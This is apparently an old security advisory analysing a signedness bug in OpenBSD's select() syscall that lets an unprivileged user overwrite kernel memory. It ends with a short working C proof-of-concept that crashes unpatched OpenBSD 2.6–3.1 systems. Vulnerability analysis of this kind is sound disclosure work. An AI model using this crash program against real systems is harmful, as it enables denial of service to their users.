Research on the recent OpenBSD select() bug and its possible exploitation. Includes a local denial of service exploit which was tested on OpenBSD v2.6 - 3.1.
a139e465d5432bfb22c8cb02fcaad81f3ba8d7d7f42d2f31a3ad875ca2065362
Hi there,
Recently a bug in the select() syscall of openbsd was published.
This text describes the details and the eventual exploitation of this bug.
First of all let us look at the definition of select():
int select(int nfds, fd_set *readfds, fd_set *writefds,
fd_set *exceptfds, struct timeval *timeout);
The first argument is the number of the file descriptors, followed by
the three sets of descriptors (read,write,except) plus a timeout before
returning, which is optional (NULL equals no timeout).
The implementation of sys_select() takes place in kern/sys_generic.c.
Let's go through the code, step by step:
..
register struct sys_select_args /* {
syscallarg(int) nd;
syscallarg(fd_set *) in;
syscallarg(fd_set *) ou;
syscallarg(fd_set *) ex;
syscallarg(struct timeval *) tv;
} */ *uap = v;
fd_set bits[6], *pibits[3], *pobits[3];
..
int s, ncoll, error = 0, timo;
u_int ni;
..
(1) if (SCARG(uap, nd) > p->p_fd->fd_nfiles) {
/* forgiving; slightly wrong */
SCARG(uap, nd) = p->p_fd->fd_nfiles;
}
(2) ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask);
..
(3) #define getbits(name, x) \
if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), \
(caddr_t)pibits[x], ni))) \
goto done;
(4) getbits(in, 0);
getbits(ou, 1);
getbits(ex, 2);
#undef getbits
..
SCARG is a macro to access arg2 from structure arg1. At (1) an upperbound check
is done to adjust 'nd' (arg1 of select) in case it is bigger than the number of
open files that are allocated. There we spot the first problem. Both values
of the comparison are signed integers and it only checks for an upperbound limit.
What happens if you enter a negative value ? We will see.
At (2) it stores in 'ni' (which is defined as u_int) how many bytes are
needed to copy from the descriptor sets to the local pibits fd_set. If we assume
that 'nd' is a negative value then something special happens. Let's zoom in:
(from sys/types.h)
#define NBBY 8
typedef int32_t fd_mask;
#define NFDBITS (sizeof(fd_mask) * NBBY)
#define howmany(x, y) (((x) + ((y) - 1)) / (y))
On an i386 machine int32_t is 4 bytes, thus NFDBITS equals 32.
If x is smaller than -31 howmany results in a negative value, thus 'ni' swaps to
a very big unsigned number. e.g. 536870908.
This behaviour has a catastrophic impact then the macro (3) getbits does a (4) copyin
(which is infact something like bcopy) from in,ou,ex to pibits[] with the length
of ni!
What does that mean? You can overwrite kernel memory by providing a negative nd and
with pointers to arbitrary data as arg2,3,4 of the select syscall, since the length
'ni' is pretty messed up.
Like that it's very trivial to crash the system as unpriviledged user. It might even
be possible to compromise the system with specially crafted pointers...
What follows is a very small program which immediately crashes any unpatched OpenBSD
system (tested 2.6-3.1) as unpriviledged user:
cat > obsdfault.c << EOF
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
int main() {
int r;
char *la = "VBASAAAAAAAAAAAAAAA";
r = select(-19999, la, NULL, NULL, NULL);
exit(0);
}
EOF
ugh. yes, it's that easy. Now, select is a very vital syscall and it is/was buggy.
Imagine, there are 182 other syscalls .... ;-).
Have fun,
your drugphish.ch security team
sec@drugphish.ch